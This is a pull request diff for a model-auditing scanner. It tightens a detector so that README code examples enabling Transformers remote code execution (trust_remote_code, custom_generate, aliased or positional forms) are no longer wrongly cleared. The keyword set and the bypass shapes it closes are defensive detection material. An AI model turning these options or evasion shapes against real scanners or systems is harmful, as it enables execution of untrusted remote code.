### PR TITLE
fix(network): block README remote-code trust bypasses

### DIFF
--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -10,6 +10,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 ### Bug Fixes
 
 - Avoid network false positives for bounded README examples that download sample images over HTTPS from Hugging Face.
+- Preserve README network detections when Transformers examples enable or dynamically configure remote code execution.
 - Prevent Windows cache identity probes from creating locked temporary files inside scanned directories.
 - Preserve locked Windows cache probes reached through directory aliases while clearing stale scan results.
 

--- a/CHANGELOG.md
+++ b/CHANGELOG.md
@@ -10,7 +10,7 @@ and this project adheres to [Semantic Versioning](https://semver.org/spec/v2.0.0
 ### Bug Fixes
 
 - Avoid network false positives for bounded README examples that download sample images over HTTPS from Hugging Face.
-- Preserve README network detections when Transformers examples enable or dynamically configure remote code execution.
+- Preserve README network detections when Transformers examples enable or dynamically configure remote code execution, including through `generate(custom_generate=...)`.
 - Prevent Windows cache identity probes from creating locked temporary files inside scanned directories.
 - Preserve locked Windows cache probes reached through directory aliases while clearing stale scan results.
 - Place cross-volume Windows cache identity probes near the volume root instead of the nearest ancestor of the scanned path, so a probe can no longer appear inside a directory tree that a concurrent scan is walking.

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -2033,7 +2033,6 @@ def _matching_readme_image_fence_end(
 
 # Transformers keywords that cause Hub-hosted Python to be fetched and executed.
 _REMOTE_CODE_KEYWORDS = frozenset({"custom_generate", "trust_remote_code"})
-_GENERATE_CUSTOM_IMPLEMENTATION_POSITIONS = (10, 11)
 
 
 def _remote_code_option_is_disabled(name: str, value: ast.expr) -> bool:
@@ -2046,6 +2045,23 @@ def _remote_code_option_is_disabled(name: str, value: ast.expr) -> bool:
     return True
 
 
+def _generate_positional_remote_code_is_disabled(arguments: list[ast.expr]) -> bool:
+    if len(arguments) <= 10:
+        return True
+
+    position_ten = arguments[10]
+    position_ten_is_disabled_or_v4_default = isinstance(position_ten, ast.Constant) and (
+        position_ten.value is None or isinstance(position_ten.value, bool)
+    )
+    if len(arguments) == 11:
+        return position_ten_is_disabled_or_v4_default
+
+    return position_ten_is_disabled_or_v4_default and _remote_code_option_is_disabled(
+        "custom_generate",
+        arguments[11],
+    )
+
+
 def _remote_code_mapping_is_proven_safe(
     value: ast.expr,
     *,
@@ -2054,48 +2070,62 @@ def _remote_code_mapping_is_proven_safe(
     unsafe_names: frozenset[str],
     proven_mapping_call_ids: frozenset[int],
     call_position: int,
-    resolving: frozenset[str] = frozenset(),
 ) -> bool:
-    if isinstance(value, ast.Name):
-        if value.id in resolving or value.id in unsafe_names or binding_counts[value.id] != 1:
+    memo: dict[int, bool] = {}
+    remaining_steps = _MAX_README_IMAGE_EXAMPLE_AST_NODES
+
+    def visit(current: ast.expr, resolving: frozenset[str]) -> bool:
+        nonlocal remaining_steps
+
+        node_id = id(current)
+        if node_id in memo:
+            return memo[node_id]
+        if remaining_steps <= 0:
             return False
-        candidates = bindings.get(value.id, [])
-        if len(candidates) != 1:
-            return False
-        binding_position, binding_value = candidates[0]
-        if binding_position >= call_position:
-            return False
-        return _remote_code_mapping_is_proven_safe(
-            binding_value,
-            bindings=bindings,
-            binding_counts=binding_counts,
-            unsafe_names=unsafe_names,
-            proven_mapping_call_ids=proven_mapping_call_ids,
-            call_position=call_position,
-            resolving=resolving | {value.id},
-        )
-    if isinstance(value, ast.Call):
-        return id(value) in proven_mapping_call_ids
-    if not isinstance(value, ast.Dict):
+        remaining_steps -= 1
+
+        if isinstance(current, ast.Name):
+            if current.id in resolving or current.id in unsafe_names or binding_counts[current.id] != 1:
+                result = False
+            else:
+                candidates = bindings.get(current.id, [])
+                if len(candidates) != 1:
+                    result = False
+                else:
+                    binding_position, binding_value = candidates[0]
+                    result = binding_position < call_position and visit(
+                        binding_value,
+                        resolving | {current.id},
+                    )
+        elif isinstance(current, ast.Call):
+            result = node_id in proven_mapping_call_ids
+        elif isinstance(current, ast.Dict):
+            result = True
+            for key, item_value in zip(current.keys, current.values, strict=True):
+                if key is None:
+                    if not visit(item_value, resolving):
+                        result = False
+                        break
+                    continue
+                if not isinstance(key, ast.Constant) or not isinstance(key.value, str):
+                    result = False
+                    break
+                if key.value in _REMOTE_CODE_KEYWORDS and not _remote_code_option_is_disabled(
+                    key.value,
+                    item_value,
+                ):
+                    result = False
+                    break
+        else:
+            result = False
+
+        memo[node_id] = result
+        return result
+
+    try:
+        return visit(value, frozenset())
+    except RecursionError:
         return False
-    for key, item_value in zip(value.keys, value.values, strict=True):
-        if key is None:
-            if not _remote_code_mapping_is_proven_safe(
-                item_value,
-                bindings=bindings,
-                binding_counts=binding_counts,
-                unsafe_names=unsafe_names,
-                proven_mapping_call_ids=proven_mapping_call_ids,
-                call_position=call_position,
-                resolving=resolving,
-            ):
-                return False
-            continue
-        if not isinstance(key, ast.Constant) or not isinstance(key.value, str):
-            return False
-        if key.value in _REMOTE_CODE_KEYWORDS and not _remote_code_option_is_disabled(key.value, item_value):
-            return False
-    return True
 
 
 def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
@@ -2663,12 +2693,8 @@ def _is_valid_official_readme_sample_image_example(example: bytes) -> bool:
             if node.func.attr == "generate":
                 if any(isinstance(argument, ast.Starred) for argument in node.args):
                     return False
-                for custom_generate_position in _GENERATE_CUSTOM_IMPLEMENTATION_POSITIONS:
-                    if len(node.args) > custom_generate_position and not _remote_code_option_is_disabled(
-                        "custom_generate",
-                        node.args[custom_generate_position],
-                    ):
-                        return False
+                if not _generate_positional_remote_code_is_disabled(node.args):
+                    return False
             for keyword in node.keywords:
                 if keyword.arg is not None:
                     continue

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -2251,7 +2251,7 @@ def _is_valid_official_readme_sample_image_example(
         for target in statement.targets
         if isinstance(target, ast.Name)
     }
-    documented_builtin_names = {"enumerate", "len", "print", "range", "round", "zip"}
+    documented_builtin_names = {"enumerate", "len", "object", "print", "range", "round", "zip"}
     imported_names = {"requests"}
     transformers_factory_names: set[str] = set()
     transformers_mapping_factory_names: set[str] = set()
@@ -2277,6 +2277,7 @@ def _is_valid_official_readme_sample_image_example(
                     transformers_factory_names.add(alias.name)
                     if alias.name.endswith(("Processor", "Tokenizer", "TokenizerFast", "FeatureExtractor")):
                         transformers_mapping_factory_names.add(alias.name)
+    reserved_names = protected_names | imported_names | documented_builtin_names
     known_names = (
         imported_names
         | documented_builtin_names
@@ -2492,6 +2493,58 @@ def _is_valid_official_readme_sample_image_example(
             return field_name in {"body", "orelse"}
         return isinstance(container, ast.With) and field_name == "body" and is_canonical_no_grad_with(container)
 
+    def direct_eager_call_statement(call: ast.Call) -> ast.stmt | None:
+        membership = direct_statement_membership(call)
+        if membership is None:
+            return None
+        statement = membership[3]
+        if isinstance(statement, ast.Expr) and statement.value is call:
+            return statement
+        is_generate_call = isinstance(call.func, ast.Attribute) and call.func.attr == "generate"
+        if (
+            is_generate_call
+            and isinstance(statement, ast.Assign)
+            and statement.value is call
+            and len(statement.targets) == 1
+            and isinstance(statement.targets[0], ast.Name)
+        ):
+            return statement
+        if (
+            is_generate_call
+            and isinstance(statement, ast.AnnAssign)
+            and statement.value is call
+            and statement.simple == 1
+            and isinstance(statement.target, ast.Name)
+        ):
+            return statement
+        return None
+
+    def is_supported_direct_eager_call(call: ast.Call) -> bool:
+        statement = direct_eager_call_statement(call)
+        if statement is None:
+            return False
+        if isinstance(statement, ast.Expr):
+            return True
+        membership = statement_memberships.get(id(statement))
+        if membership is None:
+            return False
+        container, field_name, _statement_index, _statement = membership
+        if isinstance(container, ast.Module):
+            return True
+        return (
+            isinstance(container, ast.With)
+            and field_name == "body"
+            and is_canonical_no_grad_with(container)
+            and isinstance(parents.get(id(container)), ast.Module)
+            and any(
+                isinstance(candidate, ast.Import)
+                and any(alias.name == "torch" and alias.asname is None for alias in candidate.names)
+                and top_level_statement_precedes(candidate, container)
+                for candidate in tree.body
+            )
+            and not name_write_nodes.get("torch")
+        )
+
     def binding_precedes_reference_in_supported_body(binding: ast.AST, reference: ast.AST) -> bool:
         if execution_may_be_deferred(reference):
             return False
@@ -2501,14 +2554,20 @@ def _is_valid_official_readme_sample_image_example(
             return False
         binding_container, binding_field, binding_index, binding_statement = binding_membership
         reference_container, reference_field, reference_index, reference_statement = reference_membership
-        reference_is_direct_statement = reference_statement is reference or (
-            isinstance(reference_statement, ast.Expr) and reference_statement.value is reference
+        eager_reference_statement = direct_eager_call_statement(reference) if isinstance(reference, ast.Call) else None
+        reference_is_direct_statement = (
+            reference_statement is reference or reference_statement is eager_reference_statement
         )
         if (
             binding_container is not reference_container
             or binding_field != reference_field
             or binding_statement is not binding
             or not reference_is_direct_statement
+            or (
+                eager_reference_statement is not None
+                and isinstance(reference_statement, (ast.Assign, ast.AnnAssign))
+                and (not isinstance(reference, ast.Call) or not is_supported_direct_eager_call(reference))
+            )
             or binding_index >= reference_index
             or not is_single_execution_body(binding_container, binding_field)
         ):
@@ -2655,7 +2714,7 @@ def _is_valid_official_readme_sample_image_example(
         )
 
     def mapping_operation_may_affect_call(operation: ast.AST, call: ast.Call) -> bool:
-        if is_direct_expression_call(call) and operation_definitely_follows_reference(operation, call):
+        if is_supported_direct_eager_call(call) and operation_definitely_follows_reference(operation, call):
             return False
         return operation_may_affect_reference(operation, call)
 
@@ -2852,6 +2911,7 @@ def _is_valid_official_readme_sample_image_example(
     mapping_alias_targets = {
         id(binding_node): frozenset(target_names) for binding_node, target_names, _source_name in mapping_alias_groups
     }
+    mapping_transfer_alias_sources: dict[int, str] = {}
 
     def alias_state_after_edge(
         binding_node: ast.AST,
@@ -2871,7 +2931,12 @@ def _is_valid_official_readme_sample_image_example(
             )
         if operation_definitely_follows_reference(binding_node, reference):
             binding_value = binding_node.value if isinstance(binding_node, (ast.Assign, ast.AnnAssign)) else None
-            if not isinstance(binding_value, ast.Name) or binding_value.id != current_name:
+            binding_source_name = (
+                binding_value.id
+                if isinstance(binding_value, ast.Name)
+                else mapping_transfer_alias_sources.get(id(binding_node))
+            )
+            if binding_source_name != current_name:
                 return None
             for write_node in name_write_nodes.get(current_name, []):
                 if node_is_within(write_node, reference) or node_is_within(write_node, binding_node):
@@ -3255,6 +3320,51 @@ def _is_valid_official_readme_sample_image_example(
             )
         )
 
+    transformers_factory_alias_proof_cache: dict[tuple[str, int, int], bool] = {}
+
+    def transformers_factory_name_is_proven_safe(
+        factory_name: str,
+        reference: ast.Call,
+        allowed_factory_names: set[str],
+    ) -> bool:
+        cache_key = (factory_name, id(reference), id(allowed_factory_names))
+        if cache_key in transformers_factory_alias_proof_cache:
+            return transformers_factory_alias_proof_cache[cache_key]
+
+        current_name = factory_name
+        seen_names: set[str] = set()
+        while current_name not in allowed_factory_names:
+            if current_name in seen_names or not proof_budget.consume(1):
+                transformers_factory_alias_proof_cache[cache_key] = False
+                return False
+            seen_names.add(current_name)
+            candidates = [
+                (binding_node, binding_value)
+                for binding_node, binding_value in single_name_bindings.get(current_name, [])
+                if top_level_statement_precedes(binding_node, reference)
+            ]
+            prior_writes = [
+                write_node
+                for write_node in name_write_nodes.get(current_name, [])
+                if top_level_statement_precedes(write_node, reference)
+            ]
+            if len(candidates) != 1 or len(prior_writes) != 1:
+                transformers_factory_alias_proof_cache[cache_key] = False
+                return False
+            binding_node, binding_value = candidates[0]
+            if (
+                not isinstance(parents.get(id(binding_node)), ast.Module)
+                or not is_single_name_binding(binding_node, binding_value, current_name)
+                or not isinstance(binding_value, ast.Name)
+            ):
+                transformers_factory_alias_proof_cache[cache_key] = False
+                return False
+            current_name = binding_value.id
+
+        result = not name_write_nodes.get(current_name)
+        transformers_factory_alias_proof_cache[cache_key] = result
+        return result
+
     def transformers_factory_call_is_proven_safe(
         factory_call: ast.expr,
         allowed_factory_names: set[str],
@@ -3265,7 +3375,11 @@ def _is_valid_official_readme_sample_image_example(
             and isinstance(factory_call.func, ast.Attribute)
             and factory_call.func.attr == "from_pretrained"
             and isinstance(factory_call.func.value, ast.Name)
-            and factory_call.func.value.id in allowed_factory_names
+            and transformers_factory_name_is_proven_safe(
+                factory_call.func.value.id,
+                factory_call,
+                allowed_factory_names,
+            )
         )
 
     def trusted_transformers_instance_is_proven_safe(
@@ -3314,8 +3428,15 @@ def _is_valid_official_readme_sample_image_example(
             if not isinstance(device_value, ast.Constant) or not isinstance(device_value.value, str):
                 return False
             device = device_value.value
-            if device not in {"cpu", "cuda", "hpu", "mps", "npu", "xpu"} and not (
-                device.startswith("cuda:") and device.removeprefix("cuda:").isdecimal()
+            if device in {"cpu", "cuda", "hpu", "mps", "npu", "xpu"}:
+                continue
+            device_kind, separator, device_index = device.partition(":")
+            if (
+                not separator
+                or device_kind not in {"cuda", "hpu", "mps", "npu", "xpu"}
+                or not device_index
+                or not device_index.isascii()
+                or not device_index.isdecimal()
             ):
                 return False
         return not pending_values
@@ -3466,6 +3587,65 @@ def _is_valid_official_readme_sample_image_example(
             return None
         return (*prior_chain, id(binding_node))
 
+    def renamed_mapping_transfer_binding_chain(
+        binding_node: ast.AST,
+        binding_name: str,
+        unwrapped_value: ast.expr,
+        transfer_calls: tuple[ast.Call, ...],
+    ) -> tuple[int, ...] | None:
+        if (
+            not transfer_calls
+            or not isinstance(unwrapped_value, ast.Name)
+            or unwrapped_value.id == binding_name
+            or not isinstance(parents.get(id(binding_node)), ast.Module)
+        ):
+            return None
+
+        transfer_reference = transfer_calls[-1]
+        call_position = top_level_statement_indices.get(id(transfer_reference))
+        binding_position = top_level_statement_indices.get(id(binding_node))
+        if call_position is None or binding_position is None:
+            return None
+        source_bindings = [
+            source_binding
+            for source_binding, _source_value in mapping_bindings.get(unwrapped_value.id, [])
+            if mapping_binding_position_at_call(source_binding, transfer_reference) < call_position
+        ]
+        destination_bindings = [
+            destination_binding
+            for destination_binding, _destination_value in mapping_bindings.get(binding_name, [])
+            if top_level_statement_indices.get(id(destination_binding), len(tree.body)) <= binding_position
+        ]
+        destination_writes = [
+            write_node
+            for write_node in name_write_nodes.get(binding_name, [])
+            if top_level_statement_indices.get(id(write_node), len(tree.body)) <= binding_position
+        ]
+        if (
+            not source_bindings
+            or id(source_bindings[-1]) not in proven_mapping_binding_chains
+            or destination_bindings != [binding_node]
+            or not name_writes_match_binding_chain(destination_writes, (id(binding_node),))
+        ):
+            return None
+
+        candidate_transfer_call_ids = frozenset(
+            proven_mapping_transfer_call_id_set | {id(transfer_call) for transfer_call in transfer_calls}
+        )
+        if not remote_code_mapping_is_proven_safe_at_call(
+            unwrapped_value,
+            transfer_reference,
+            proven_mapping_call_ids=frozenset(proven_mapping_call_id_set),
+            proven_mapping_binding_chains=proven_mapping_binding_chains,
+            proven_mapping_transfer_call_ids=candidate_transfer_call_ids,
+        ):
+            return None
+        mapping_transfer_alias_sources[id(binding_node)] = unwrapped_value.id
+        mapping_alias_targets[id(binding_node)] = frozenset({binding_name})
+        mapping_alias_target_names.add(binding_name)
+        mapping_aliases.append((binding_node, unwrapped_value.id, binding_name))
+        return (id(binding_node),)
+
     def conditional_mapping_test_is_proven_inert(test: ast.expr, binding_node: ast.AST) -> bool:
         if isinstance(test, ast.Constant):
             return isinstance(test.value, bool)
@@ -3591,6 +3771,13 @@ def _is_valid_official_readme_sample_image_example(
                 transfer_calls,
                 proven_mapping_binding_chains,
             )
+            if binding_chain is None:
+                binding_chain = renamed_mapping_transfer_binding_chain(
+                    binding_node,
+                    binding_name,
+                    mapping_value,
+                    transfer_calls,
+                )
         if binding_chain is None:
             continue
         proven_mapping_binding_chains[id(binding_node)] = binding_chain
@@ -3775,7 +3962,9 @@ def _is_valid_official_readme_sample_image_example(
         ) -> frozenset[str] | None:
             nonlocal remaining_steps
             if candidate_name in documented_builtin_names:
-                return frozenset({benign_callable_marker})
+                return frozenset(
+                    {untrusted_callable_marker if name_write_nodes.get(candidate_name) else benign_callable_marker}
+                )
             key = (candidate_name, id(reference))
             if key in memo:
                 return memo[key]
@@ -3862,7 +4051,8 @@ def _is_valid_official_readme_sample_image_example(
             return False
         mapping_calls = remote_mapping_calls_by_name.get(target.value.id, [])
         if mapping_calls and all(
-            is_direct_expression_call(mapping_call) and operation_definitely_follows_reference(target, mapping_call)
+            is_supported_direct_eager_call(mapping_call)
+            and operation_definitely_follows_reference(target, mapping_call)
             for mapping_call in mapping_calls
         ):
             return True
@@ -3921,10 +4111,10 @@ def _is_valid_official_readme_sample_image_example(
         if isinstance(node, ast.ClassDef):
             return False
         if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)) and (
-            node.name in protected_names or node.decorator_list
+            node.name in reserved_names or node.decorator_list
         ):
             return False
-        if isinstance(node, (ast.Global, ast.Nonlocal)) and any(name in protected_names for name in node.names):
+        if isinstance(node, (ast.Global, ast.Nonlocal)) and any(name in reserved_names for name in node.names):
             return False
         if isinstance(node, (ast.Assign, ast.AnnAssign, ast.AugAssign)):
             targets = node.targets if isinstance(node, ast.Assign) else [node.target]
@@ -3935,7 +4125,7 @@ def _is_valid_official_readme_sample_image_example(
                 return False
         if (
             isinstance(node, ast.Name)
-            and node.id in protected_names | imported_names | documented_builtin_names
+            and node.id in reserved_names
             and isinstance(node.ctx, (ast.Store, ast.Del))
             and id(node) not in allowed_targets
         ):
@@ -3953,9 +4143,9 @@ def _is_valid_official_readme_sample_image_example(
             )
         ):
             return False
-        if isinstance(node, ast.arg) and node.arg in protected_names:
+        if isinstance(node, ast.arg) and node.arg in reserved_names:
             return False
-        if isinstance(node, ast.ExceptHandler) and node.name in protected_names:
+        if isinstance(node, ast.ExceptHandler) and node.name in reserved_names:
             return False
         if isinstance(node, ast.Call) and isinstance(node.func, ast.Name):
             callable_resolution = named_sensitive_callable_resolution(node.func.id, node)

--- a/modelaudit/detectors/network_comm.py
+++ b/modelaudit/detectors/network_comm.py
@@ -1734,6 +1734,7 @@ _MAX_README_IMAGE_EXAMPLE_AST_NODES = 1024
 _MAX_README_IMAGE_EXAMPLE_FENCE_OPENINGS = 64
 _MAX_README_IMAGE_EXAMPLE_FENCES = 256
 _MAX_README_IMAGE_EXAMPLE_MAPPING_PROOF_WORK = 64 * _MAX_README_IMAGE_EXAMPLE_AST_NODES
+_MAX_README_IMAGE_EXAMPLE_NAMED_CALLABLE_PROOF_WORK = 64 * _MAX_README_IMAGE_EXAMPLE_AST_NODES
 _PYTHON_README_FENCE_PATTERN = re.compile(rb"(?m)^[ \t]{0,3}(?P<fence>`{3,}|~{3,})(?:python|py)[ \t]*\r?\n")
 _README_FENCE_END_PATTERN = re.compile(rb"(?m)^[ \t]{0,3}(?:`{3,}|~{3,})[ \t]*\r?$")
 _QUALIFIED_REQUESTS_CALL_PATTERN = re.compile(rb"\brequests\s*\.\s*[A-Za-z_][A-Za-z_0-9]*\s*\(")
@@ -1744,8 +1745,9 @@ _CALL_SYNTAX_SUFFIX_PATTERN = re.compile(rb"(?:[\s)]|#[^\n]*\n)*\(")
 
 class _ReadmeImageExampleProofBudget:
     def __init__(self) -> None:
-        self.remaining = _MAX_README_IMAGE_EXAMPLE_MAPPING_PROOF_WORK
-        self.exceeded = False
+        self.remaining: int = _MAX_README_IMAGE_EXAMPLE_MAPPING_PROOF_WORK
+        self.named_callable_remaining: int = _MAX_README_IMAGE_EXAMPLE_NAMED_CALLABLE_PROOF_WORK
+        self.exceeded: bool = False
 
     def consume(self, work: int) -> bool:
         if self.exceeded or work > self.remaining:
@@ -1753,6 +1755,14 @@ class _ReadmeImageExampleProofBudget:
             self.exceeded = True
             return False
         self.remaining -= work
+        return True
+
+    def consume_named_callable(self, work: int) -> bool:
+        if self.exceeded or work > self.named_callable_remaining:
+            self.named_callable_remaining = 0
+            self.exceeded = True
+            return False
+        self.named_callable_remaining -= work
         return True
 
 
@@ -2063,6 +2073,26 @@ def _remote_code_option_is_disabled(name: str, value: ast.expr) -> bool:
     return True
 
 
+def _remote_code_option_is_proven_disabled(
+    name: str,
+    value: ast.expr,
+    *,
+    bindings: dict[str, list[tuple[int, ast.expr]]],
+    binding_counts: Counter[str],
+    call_position: int,
+) -> bool:
+    if _remote_code_option_is_disabled(name, value):
+        return True
+    if not isinstance(value, ast.Name) or binding_counts[value.id] != 1:
+        return False
+    candidates = bindings.get(value.id, [])
+    return (
+        len(candidates) == 1
+        and candidates[0][0] < call_position
+        and _remote_code_option_is_disabled(name, candidates[0][1])
+    )
+
+
 def _generate_positional_remote_code_is_disabled(arguments: list[ast.expr]) -> bool:
     if len(arguments) <= 10:
         return True
@@ -2131,9 +2161,12 @@ def _remote_code_mapping_is_proven_safe(
                 if not isinstance(key, ast.Constant) or not isinstance(key.value, str):
                     result = False
                     break
-                if key.value in _REMOTE_CODE_KEYWORDS and not _remote_code_option_is_disabled(
+                if key.value in _REMOTE_CODE_KEYWORDS and not _remote_code_option_is_proven_disabled(
                     key.value,
                     item_value,
+                    bindings=bindings,
+                    binding_counts=binding_counts,
+                    call_position=call_position,
                 ):
                     result = False
                     break
@@ -2368,6 +2401,13 @@ def _is_valid_official_readme_sample_image_example(
         candidates.sort(key=lambda item: (getattr(item[0], "lineno", 0), getattr(item[0], "col_offset", 0)))
     for candidates in name_value_bindings.values():
         candidates.sort(key=lambda item: (getattr(item[0], "lineno", 0), getattr(item[0], "col_offset", 0)))
+
+    named_callable_call_count = sum(
+        isinstance(node, ast.Call) and isinstance(node.func, ast.Name) and node.func.id not in documented_builtin_names
+        for node in nodes
+    )
+    if not proof_budget.consume_named_callable(len(nodes) * named_callable_call_count):
+        return False
 
     top_level_statement_indices = {
         id(descendant): statement_index
@@ -3166,6 +3206,41 @@ def _is_valid_official_readme_sample_image_example(
             call_position=call_position,
         )
 
+    remote_code_option_proof_cache: dict[tuple[str, int, int], bool] = {}
+
+    def remote_code_option_is_proven_disabled_at_call(
+        name: str,
+        value: ast.expr,
+        call: ast.Call,
+    ) -> bool:
+        cache_key = (name, id(value), id(call))
+        if cache_key in remote_code_option_proof_cache:
+            return remote_code_option_proof_cache[cache_key]
+        if _remote_code_option_is_disabled(name, value):
+            result = True
+        elif isinstance(value, ast.Name):
+            candidates = [
+                (binding_node, binding_value)
+                for binding_node, binding_value in single_name_bindings.get(value.id, [])
+                if mapping_operation_may_affect_call(binding_node, call)
+            ]
+            relevant_write_count = sum(
+                mapping_operation_may_affect_call(write_node, call) for write_node in name_write_nodes.get(value.id, [])
+            )
+            call_position = top_level_statement_indices.get(id(call))
+            result = (
+                len(candidates) == 1
+                and relevant_write_count == 1
+                and call_position is not None
+                and binding_position_at_reference(candidates[0][0], call) < call_position
+                and is_single_name_binding(candidates[0][0], candidates[0][1], value.id)
+                and _remote_code_option_is_disabled(name, candidates[0][1])
+            )
+        else:
+            result = False
+        remote_code_option_proof_cache[cache_key] = result
+        return result
+
     def call_has_only_proven_safe_mapping_arguments(value: ast.Call) -> bool:
         return (
             not any(isinstance(argument, ast.Starred) for argument in value.args)
@@ -3174,7 +3249,8 @@ def _is_valid_official_readme_sample_image_example(
                 for keyword in value.keywords
             )
             and not any(
-                keyword.arg in _REMOTE_CODE_KEYWORDS and not _remote_code_option_is_disabled(keyword.arg, keyword.value)
+                keyword.arg in _REMOTE_CODE_KEYWORDS
+                and not remote_code_option_is_proven_disabled_at_call(keyword.arg, keyword.value, value)
                 for keyword in value.keywords
             )
         )
@@ -3244,6 +3320,35 @@ def _is_valid_official_readme_sample_image_example(
                 return False
         return not pending_values
 
+    proven_transformers_instance_binding_chains: dict[int, tuple[int, ...]] = {}
+
+    def proven_transformers_instance_chain_precedes_reference(
+        instance_name: str,
+        reference: ast.AST,
+    ) -> bool:
+        if execution_may_be_deferred(reference):
+            return False
+        prior_bindings = [
+            instance_binding
+            for instance_binding, _instance_value in mapping_bindings.get(instance_name, [])
+            if top_level_statement_precedes(instance_binding, reference)
+        ]
+        if not prior_bindings or any(
+            not isinstance(parents.get(id(instance_binding)), ast.Module) for instance_binding in prior_bindings
+        ):
+            return False
+        binding_chain = proven_transformers_instance_binding_chains.get(id(prior_bindings[-1]))
+        prior_writes = [
+            write_node
+            for write_node in name_write_nodes.get(instance_name, [])
+            if top_level_statement_precedes(write_node, reference)
+        ]
+        return (
+            binding_chain is not None
+            and tuple(id(instance_binding) for instance_binding in prior_bindings) == binding_chain
+            and name_writes_match_binding_chain(prior_writes, binding_chain)
+        )
+
     def mapping_device_is_proven_safe(value: ast.expr, binding_node: ast.AST) -> bool:
         if is_allowed_local_device(value):
             return True
@@ -3252,7 +3357,7 @@ def _is_valid_official_readme_sample_image_example(
                 value.value.id,
                 binding_node,
                 transformers_factory_names,
-            )
+            ) or proven_transformers_instance_chain_precedes_reference(value.value.id, binding_node)
         if not isinstance(value, ast.Name):
             return False
         device_bindings = [
@@ -3275,7 +3380,7 @@ def _is_valid_official_readme_sample_image_example(
             and is_allowed_local_device(device_value)
         )
 
-    def unwrap_safe_mapping_device_transfers(
+    def unwrap_safe_local_device_transfers(
         value: ast.expr,
         binding_node: ast.AST,
     ) -> tuple[ast.expr, tuple[ast.Call, ...]] | None:
@@ -3330,6 +3435,37 @@ def _is_valid_official_readme_sample_image_example(
             getattr(item[0], "col_offset", 0),
         ),
     )
+
+    def extended_transfer_binding_chain(
+        binding_node: ast.AST,
+        binding_name: str,
+        unwrapped_value: ast.expr,
+        transfer_calls: tuple[ast.Call, ...],
+        proven_binding_chains: dict[int, tuple[int, ...]],
+    ) -> tuple[int, ...] | None:
+        if not transfer_calls or not isinstance(unwrapped_value, ast.Name) or unwrapped_value.id != binding_name:
+            return None
+        prior_bindings = [
+            prior_binding
+            for prior_binding, _prior_value in mapping_bindings.get(binding_name, [])
+            if top_level_statement_precedes(prior_binding, binding_node)
+        ]
+        if not prior_bindings:
+            return None
+        prior_chain = proven_binding_chains.get(id(prior_bindings[-1]))
+        prior_writes = [
+            write_node
+            for write_node in name_write_nodes.get(binding_name, [])
+            if top_level_statement_precedes(write_node, binding_node)
+        ]
+        if (
+            prior_chain is None
+            or tuple(id(prior_binding) for prior_binding in prior_bindings) != prior_chain
+            or not name_writes_match_binding_chain(prior_writes, prior_chain)
+        ):
+            return None
+        return (*prior_chain, id(binding_node))
+
     for binding_node, binding_name, binding_value in ordered_mapping_bindings:
         if not isinstance(binding_value, ast.Call) or not is_single_name_binding(
             binding_node,
@@ -3337,32 +3473,32 @@ def _is_valid_official_readme_sample_image_example(
             binding_name,
         ):
             continue
-        unwrapped_mapping = unwrap_safe_mapping_device_transfers(binding_value, binding_node)
+        unwrapped_mapping = unwrap_safe_local_device_transfers(binding_value, binding_node)
         if unwrapped_mapping is None:
             continue
         mapping_value, transfer_calls = unwrapped_mapping
+        if transformers_factory_call_is_proven_safe(mapping_value, transformers_factory_names):
+            proven_transformers_instance_binding_chains[id(binding_node)] = (id(binding_node),)
+        elif instance_chain := extended_transfer_binding_chain(
+            binding_node,
+            binding_name,
+            mapping_value,
+            transfer_calls,
+            proven_transformers_instance_binding_chains,
+        ):
+            proven_transformers_instance_binding_chains[id(binding_node)] = instance_chain
+
         binding_chain: tuple[int, ...] | None = None
         if trusted_mapping_factory_call_is_proven_safe(binding_node, mapping_value):
             binding_chain = (id(binding_node),)
-        elif transfer_calls and isinstance(mapping_value, ast.Name) and mapping_value.id == binding_name:
-            prior_bindings = [
-                prior_binding
-                for prior_binding, _prior_value in mapping_bindings.get(binding_name, [])
-                if top_level_statement_precedes(prior_binding, binding_node)
-            ]
-            if prior_bindings:
-                prior_chain = proven_mapping_binding_chains.get(id(prior_bindings[-1]))
-                prior_writes = [
-                    write_node
-                    for write_node in name_write_nodes.get(binding_name, [])
-                    if top_level_statement_precedes(write_node, binding_node)
-                ]
-                if (
-                    prior_chain is not None
-                    and tuple(id(prior_binding) for prior_binding in prior_bindings) == prior_chain
-                    and name_writes_match_binding_chain(prior_writes, prior_chain)
-                ):
-                    binding_chain = (*prior_chain, id(binding_node))
+        else:
+            binding_chain = extended_transfer_binding_chain(
+                binding_node,
+                binding_name,
+                mapping_value,
+                transfer_calls,
+                proven_mapping_binding_chains,
+            )
         if binding_chain is None:
             continue
         proven_mapping_binding_chains[id(binding_node)] = binding_chain
@@ -3385,7 +3521,7 @@ def _is_valid_official_readme_sample_image_example(
     for transfer_call in standalone_transfer_calls:
         if execution_may_be_deferred(transfer_call):
             continue
-        unwrapped_mapping = unwrap_safe_mapping_device_transfers(transfer_call, transfer_call)
+        unwrapped_mapping = unwrap_safe_local_device_transfers(transfer_call, transfer_call)
         if unwrapped_mapping is None:
             continue
         mapping_value, transfer_calls = unwrapped_mapping
@@ -3417,7 +3553,7 @@ def _is_valid_official_readme_sample_image_example(
         for keyword in generate_call.keywords:
             if keyword.arg is not None or not isinstance(keyword.value, ast.Call):
                 continue
-            unwrapped_mapping = unwrap_safe_mapping_device_transfers(keyword.value, generate_call)
+            unwrapped_mapping = unwrap_safe_local_device_transfers(keyword.value, generate_call)
             if unwrapped_mapping is None:
                 continue
             mapping_value, transfer_calls = unwrapped_mapping
@@ -3512,6 +3648,11 @@ def _is_valid_official_readme_sample_image_example(
                 return resolve_value(value.value, reference)
             if isinstance(value, ast.Subscript):
                 return resolve_value(value.value, reference)
+            if id(reference) in proven_transformers_instance_binding_chains and is_single_name_binding(
+                reference,
+                value,
+            ):
+                return frozenset({benign_callable_marker})
             if transformers_factory_call_is_proven_safe(value, transformers_factory_names):
                 return frozenset({benign_callable_marker})
             return frozenset({untrusted_callable_marker})
@@ -3632,7 +3773,8 @@ def _is_valid_official_readme_sample_image_example(
 
     def named_sensitive_call_has_safe_options(call: ast.Call, callable_kinds: frozenset[str]) -> bool:
         if any(
